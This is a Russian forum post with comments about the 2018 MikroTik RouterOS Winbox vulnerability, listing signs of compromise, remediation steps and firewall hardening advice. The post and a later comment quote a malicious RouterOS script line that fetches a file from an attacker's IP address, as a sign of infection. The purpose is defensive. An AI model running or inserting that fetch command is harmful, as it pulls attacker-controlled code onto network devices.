525

Уязвимости MikroTik

К сожалению скриншотов не будет. Будет сухой текст.

23 апреля 2018 года обнаружена уязвимость всех продуктов микротик на RouterOS.

Причем уязвимость позволяет узнать логин и  пароль, беспрепятственно войти в систему и сделать с роутером всё что угодно.

Всё бы было настолько буднично если бы 24 июля я не обнаружил бы на своем роутере и роутерах компании эту заразу. Распространяется очень быстро.

Характерные приметы: В System - scripts появляются посторонние скрипты, вот один из них:

/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http

В файлах соответственно mikrotik.php

Отключаются все запрещающие правила фаервола.

Создаются задачи в планировщике по запуску скрипта.

Открывается сокс-прокси на нестандартном порту.

Меняются адреса днс-серверов.

Т.е. микротик готовится к участию к какой-нибудь ддос-атаке или иным задачам по команде с сервака.


Самый оптимальный вариант - обновить прошивку микротика до RouterOS 6.40.8 [bugfix] or 6.42.1 [current] и откатиться из бекапа.

Если бекапа нет, но есть базовые познания то возможно выполнить команду export file=config_backup.rsc и уже на компьютере открыв в блокноте этот файл спокойно повыпиливать лишние строки. Сбросить роутер на заводские настройки и импортировать уже подрихтованный файл конфигурации.

Ну пару советов по безопасности:

IP - Services отключить все неиспользуемые сервисы. Для используемых жестко задать IP-адреса с которых они доступны. При желании сменить порты на нестандартные.

Грамотно настроить фаерволл.

В случае если факт взлома был зафиксирован - сменить пароль на микротик.


Подробнее здесь https://forum.mikrotik.com/viewtopic.php?t=133533

Дубликаты не найдены

+14

у меня 6.42.6 (актуальная на данный момент), то есть уязвимости нет?

PS. Почитал пост по ссылке - автор опоздал на 3 месяца с инфой, для тех кто обновляется на актуальные проши пост не несет никакой инфы.

раскрыть ветку 9
+7

С правильно настроенным фаерволом можно и на старой жить.

И актуальная прошивка не гарантия, тебя могли ломануть еще на старой прошивке

+2
Стоит запустить одну прогу, указать диапазон адресов и сразу понимаешь, СКОЛЬКО тех, кто не обновляется.
0

пойду обновлюсь. как то раз не мог пароль вспомнить, пришлось сбрасывать. а тут выходит уязвимость есть...(((

0

Подтверждаю, что инфа не актуальна. Как раз пару месяцев назад не обновленные микротики подверглись атаке и положили 2 микрота на разных точках как раз шедулером.

раскрыть ветку 5
+1

Если тебя ломаннули на старой прошивке, то оьновоениемнн поможет. У тебя в конфиге останутся скрипты, которые считай и будут выполнять функции упраявления сломавгим систему - это равносильно вирусу, который уже поразил систему.

Считаю автор незря напомнил о баге.

0
И пост на Пикабу был... Я уже тогда порадовался, что WinBox отключил к чертям. Вообще не понимаю, почему он по дефолту активен, пускай даже только из локалки.
Если халтурно относиться к безопасности, то никакие патчи не спасут, не успели сломать в этот раз, так умеют в следующий
раскрыть ветку 3
+6

Чтобы огрести проблем нужно разрешить доступ к winbox снаружи.

В дефотловых конфигурациях он отключен на *-gateway портах.

Итого автор сделал дыру, забил на обновления, игнорировал письмо об обновлениях, в итоге получил проблемы, ура!

+18

Компания Microsoft, к примеру, каждую неделю выпускает патчи безопасности, которые закрывают подобного рода дыры и exploit'ы.


С подключением.


RouterOS для того и создавался, чтобы настроить систему под безопасность, а не по умолчанию.

Для этого есть Watchdog. Для этого есть скрипт автообновления.

раскрыть ветку 44
+6
Для этого есть скрипт автообновления

если это не домашний роутер, то никогда им пользоваться не надо

+14

А не страшно юзать автообновления? Они там чуть ли не каждую пятницу эти обновления клепают. Мало ли где ошибутся, все роутеры стянут хрен пойми что и лягут...

раскрыть ветку 35
-1

Мне страшно жить без обновлений.

Вам стоит пару раз потерять пару серверов, как быстро научитесь ставить обновления как можно быстрей)

раскрыть ветку 5
-9

Читайте багфиксы перед обновлением каждую пятницу. Напишите скрипт, который будет вам слать лог на почту. Какие проблемы?)))


Обновляешься - все хорошо, но могут быть баги.

Не обновляешься - может быть очень опасно, зато баги все знакомые))

раскрыть ветку 28
ещё комментарии
0
Там как я понял уязвимость через порт кнокинг была. Если icmp открыт то беда. Хотя могу ошибаться, так как читал урывками.
раскрыть ветку 3
0

Тема на форуме называется "дыра в winbox", утилита для подключения под виндой, у неё свой порт, уязвимость использует этот порт для атаки. По этой логике для реализации атаки на самом роутере должен быть включен определенный порт на прием всех входящих, либо отсутствуют базовые настройки firewall. Скажем, повесили сайт, соответственно подняли ftp, админка удаленная и тд, открыли порты, над правилами не заморачиваясь.

раскрыть ветку 2
-4

Да ебать)))


У меня два микротика для Wi-Fi моста используются. На крыше. На здоровой мачте. Я как-то раз просто в настройках покопался и эта сволочь тупо отказалась заходить в админку и конектиться по маку. Пришлось ночью, лезть на крышу снимать эту хрень, чтоб нажать кнопку reset.


Хоть бы мать их придумали как нибудь через кабель сбрасывать чтоли ...

раскрыть ветку 2
+8

там кнопка Safe Mode есть

+2

Как сказал выше оратор Safe Mode, после того как я тоже поездил ради того что ребутнуть его, теперь жму если не уверен.

+3

Обновляйтесь вовремя, настраивайте оборудование с применением головы, и да прибудет с вами сила джедая.

А если вместо головы - жопа, и дальше квиксета через винбокс не ушли - то ничего не поможет.

раскрыть ветку 2
+2

там и без квиксета, если не сбросить конфиг, то очень странные дела творятся, хотя export говорит, что все чисто.

раскрыть ветку 1
+1

Экспорт не вываливает все настройки.

Например в экспорте нет учеток. Ибо нефиг.

И нет совсем "дефолт" данных. Например по дефолту есть ас-ка БГП (ну это не ас-ка естественно, а скорее лупбэк, но неважно - параметр есть и он енейбл), но в экспорте этого нет.

Так что не только лишь все настройки попадают в рай. В смысле в экспорт.

И, да, надо помнить то у экспорта есть вербоус.

+2

Пару штук то же взломано оказалось (((  Из изменений запись в шедулере на запуск скрипта, скрипт качает нулевой файл с указанного Ip  (видимо пока нулевой или уже нулевой) плюс сняты ограничения на днс запросы из вне и на сброс invalid соединений. А так же активирован socs c  портом на 4145.  Больше изменений вроде как нет сравнивал два конфига из бэкапа и тот что после взлома. Кто еще нашел какие изменения ? А то ездить по объектам сбрасывать в ноль желания как то нету !

раскрыть ветку 2
0

да, имя файла mikrotik.php в корне, размер 0. Насколько я понимаю, скрипт после отработки стер содержимое (непонятно, почему сам файл не потер). Получить-бы полный PHP для понимания, что он менял в системе.

раскрыть ветку 1
+1

файл нулевой.. потому что он не скачан по ссылке.. по ссылке пусто. пока .. или уже

+1

Всего-то нужно было повесить на учётку админа ограничение по ip с которого можно подключится.

раскрыть ветку 18
+1

нет, надо input рубить для внешки, и оставлять только свой ip. И порты можно поставить нестандартные

раскрыть ветку 14
+1

Не надо ничего оставлять, просто поднять VPN сервер, все остальное с внешних интерфейсов резать.

раскрыть ветку 5
0

Еще как вариант наружу выставлять только порт для ВПН. Например опен по сертификатам. А рулить только с внутренних интерфейсов.

0

А разве ограничение не работает как элемент фаервола? Даже если допустим ты знаешь какой логин и пароль, то не залогиншся если твой ип другой.
ЗЫ, У меня один из микротов вообще весь трафик на свой внешний ип заварачивает в маскарад на нат в котором нет машин вообще. В итоге всегда тайм аут. Не то чтобы так было нужно, просто когда-то нат использовался. А теперь нет.

раскрыть ветку 6
+1

и потом когда что-то сломается, а ты за миллион километров по 3g с телефона заходишь, лососнуть тунца.

раскрыть ветку 1
+1

За 6 лет у меня ломался только внешний провайдер. Потому похеру где я и какой инет. А в локалке у меня есть машинка на линухе, через которую я и подключаюсь по необходимости из вне. Да и вообще в случае с РОС если его не трогать, то он работает и не ламается. А если ёкнется железо в любом случае решить проблему можно только присутсвуя лично.

0
Как вариант я делал через AD и Radius. Права на полное редактирование только у основных сотрудников, поддержка сидит с read. Остальные лесом. Пока все норм
+1

у меня филиалы на микротиках, тока меня дыры не коснулись, потому что  нормально настроен firewall

раскрыть ветку 4
0

Давайте выкладывать настройки фаерволла и обсуждать, а то каждый думает что он нормально настроен, а по итогу....

раскрыть ветку 3
0

/ip firewall filter remove [/ip firewall filter find dynamic=no]

/ip firewall address-list add list=manage %my_ip%

/ip firewall filter add chain=input action=accept src-address-list=manage

/ip firewall filter add chain=input action=reject reject-with=icmp-network-unreachable protocol=tcp dst-port=22,23,80,8291


Ну например.

0

А что там обсуждать.

Золотое правило, запрещаем все, что нужно потом разрешаем.

В этом случае, надо быть уникумом, чтобы настроить не правильно))

-4

Как минимум резать input и forward с внешних интерфейсов

0
Огненные стены - наше все!
0

простите а можно на пальцах? если роутер не с белым ip, а в сетке провайдера, опасность есть? куда ткнуть чтобы посмотреть есть ли следы этого скрипта и если есть начать паниковать?

раскрыть ветку 2
+1

Открываем WinBox, заходим System -> Scripts, если там есть скрипт содержащий "/tool fetch address=95.154.216.164" - то Вы попали (см скрин)

Или можно тыкнуть в Files и поискать файл mikrotik.php - если есть, то Вы попали (если отсортировать по дате, он будет первым)

Иллюстрация к комментарию
раскрыть ветку 1
0

Стасибо

0

даешь своему ПК статику в локалке, и делаешь чтоб залогинется можно было только с него залогиниться ну или если нужна удаленка то тоже ставишь только свой, в идеале еще и через opnvpn.

0

спасибо бро. тоже хапнул

0

А если кактус поставить рядом, поможет?

0

К чему это тем кому нужно это знает, вы мне лучше вот что скажите по микротику может кто нибудь знает, есть модем Yota, на старой прошивке при ребудете/включении маршрутизатора модем заводиться и адрес получает от провайдера, а на новых прошивках модем сразу не стартует, только после того как загрузился микротик модем включишь , выключишь тогда нормально адрес получает.

раскрыть ветку 17
+3

Говорят, что помогает если подключить модем через юсб хаб с собственным питанием. Но это конечно так себе решение если модем висанёт.

раскрыть ветку 5
0

Зачем? Микротик давно уже умеет сам питалово на усб передёргивать.

В том числе можно написать скрипт - нет интернета - передерни модем.

0

Охрененный минус такого исполнения, что питание на юзб уже из терминала не скинешь. Нетвотч на ip модема, и при таймауте скрипт  /system routerboard usb power-reset duration=3

раскрыть ветку 2
0

Годная идея, где то, когда то, тоже что такое слышал, надо попробовать.

0
А что за железка, и какой блок питания на нем?
раскрыть ветку 2
0

750gr3 ну блок стандартный, родной, 24 вольтовый.

раскрыть ветку 1
0

у меня похожая хрень была с модемами huawei, первые ребутов 20 не хочет модем видеть, а потом привыкает.


Могу костыль тебе посоветовать, проверять интерфейс/ip, если нет lte(ip), то сбрасывать питание usb


у тебя, кстати, не crs-125?

раскрыть ветку 7
0

Не модем сам определяется нормально, он только адрес не может получить, ищет ищет, включишь/выключишь, ну или просто переткнёшь получает адрес сразу.


нет 750gr3 я и на 951 пробовал такая же муть.

раскрыть ветку 6
0

А ведь как просто - /ip service set winbox disabled=yes и доступ ssh по ключу

раскрыть ветку 7
+2

Не все любят в консоле сидеть. Мне так в свое время осточертела циска. Хорошо когда у тебя статичный конфиг. А когда постоянно что-то меняется, то задалбывает сидеть в блокнотике попровляя конфиг. Особенно что касается правил фаера, когда чтобы была правильная последовательность нужно стирать всю группу и закидывать её заного с новыми изменениями.

раскрыть ветку 6
0

Эм, там же вроде как

1.copy run flash:new_config.txt

2.edit flash:new_config.txt

3.вносим нужную строку куда надо.

4.copy flash:new_config.txt run

5.wr


В синтаксисе могу ошибиться - давно это было.

0

Издеваетесь? Надо чот сконфигурить - залогинился через ssh, включил винбокс, сконфигурил, выключил винбокс

раскрыть ветку 2
0

там move есть, если про микротик, но я за winbox, через vpn

раскрыть ветку 1
0

Ничосе. Спасибо за инфу, многим пригодится.

-1

Поймал... спс за инфу

Иллюстрация к комментарию
раскрыть ветку 1
-2

Судя по количеству запусков как раз в одно и то же время со мной поймал.

-1

лучше скажите когда сделают по умолчанию закрытый доступ извне по 53 порту?

раскрыть ветку 6
0
Закрыть на фаерволе 53 на tcp и udp. В Гугле первая же ссылка по запросу "microtik 53 port"
раскрыть ветку 4
0

вопрос был про "по умолчанию"

раскрыть ветку 3
-1

Х.з. Я фаерволом тушу.

-1

У меня тоже оказался взломан. Вроде все порты были закрыты, ssh отключен, пароль нестандартный, но как то в него проникли, поменяли пароль админа и воткнули свои настройки. Пришлось сбрасывать и заного настраивать.

раскрыть ветку 1
0
Вот поэтому первое,что надо делать при настройке микрота - удалять админа и заводить свои учетки
-1
Кстати IP американский
раскрыть ветку 1
-2

Блин, на каждом углу орут, что вас всех взломают. А как начал искать информацию (не очень усердно, т.к. с костылями получилось решить вопрос по-другому) по эксплуатации этой фигни ничего удобоваримого не нашел.

По работе нужно восстановить контроль над роутером, админ посрался с директором и ушел с паролями, а мне на внешку видеорегистратор пробросить нужно.

раскрыть ветку 3
0

Так может вам это как раз и не надо?

раскрыть ветку 2
0

Не сильно надо, соглашусь. Я специализируюсь на видео, на остальную часть клиентской сетки мне плевать. Вопрос в том, что топиков в инете много, но весь их смысл сводится к трём словам "обновляйте свои микротики". Топики только засирают выдачу поисковиков. Я не спец по иб. Для меня поиск мануала по этой теме проблематичен.

Очень раздражает, когда есть возможность решить задачу. Все вокруг рассуждают, что способ есть. И больше никакой адекватной инфы (я не нашёл). Печаль.

раскрыть ветку 1
-5

Ояебу: и эти люди называют себя админами - выставили порт winbox в мир и удивляються! Есть много страшных слов которые вам бы не мешало выучить:
vpn
firewall

ipsec

ssh

А вообще новость в стиле последней (не вашей случаем) статьи "MacOS можно взломать!!!1111"
P.s. повеяло махровой ализарщиной с хабра ...

раскрыть ветку 2
0

Пост написан для того чтобы предостеречь тех, кто оказался или может оказаться в похожей ситуации. А Вы я смотрю суперадмин, всегда всё делаете правильно? Хотя мне кажется Вы один из любителей подкинуть говно на вентилятор, мол все пидорасы, один Вы Д`Артаньян. Если кто не верит может зайти в профиль @xxxmentat, там два заминусованных поста и статистика минусов в профиле в четыре раза выше чем плюсов.

раскрыть ветку 1
-3

Дай улучшу статистику минусов - еще тебе отсыплю!

-5

Вот вам и весь сказ, "миквротик таже сиська, только намного дешевле и надёжней!" "микротик скроро уделает сиско и хуембей", и прочие охренинительные истории с админских форумов. ПОЛГОДА! если не изменяет память этой дыре, и они только сейчас начали шевелиться? Мдеее.

Я не говорю что у той же радуги нет косяков, но исправляют их за пару суток макс, а особо критичные за пару часов.

раскрыть ветку 5
+2
микротик устранил эту уязвимость что-то около года назад вроде. тут попали те, кто не часто обновляется
раскрыть ветку 4
-1

Найдена уязвимость в апреле, а устранена около года назад. Вы ничего не путаете? Или пост читали через слово?

раскрыть ветку 2
-2

как понять *кто не часто обновляется*? А разве обновы автоматом не настроены в высокий приоритет и у них отдельный порт и роут до официального сервака производителя? Тогда ф топку таких админов, это эникеи, пускай идут мышки юзерам подключают.

-5

А хотите реальный хоррор?


Воткните сетку шнурком в комп без роутера и NAT. Не делайте этого!)))))

раскрыть ветку 12
+4

Я делал, все ок

раскрыть ветку 11
0

Аналогично. Даже на винде. В дата-центре стоит сервак с 2 открытыми портами, и ICMP в их число не входит.

1 разрешенный IP (на in и out).

3 года полет нормальный.

С подрядчиков эпизодически ловлю лулзы.

-Доступ выдал, подключайтесь.

-Сервер в down.

-Подключайтесь.

-Так он не пингуется...

-А должен? Подключайтесь.

-О_о, О-о-о, ээээ, ух ты, а так тоже можно?

раскрыть ветку 3
-1

На голой системе не прокатит.

раскрыть ветку 6
ещё комментарии
Похожие посты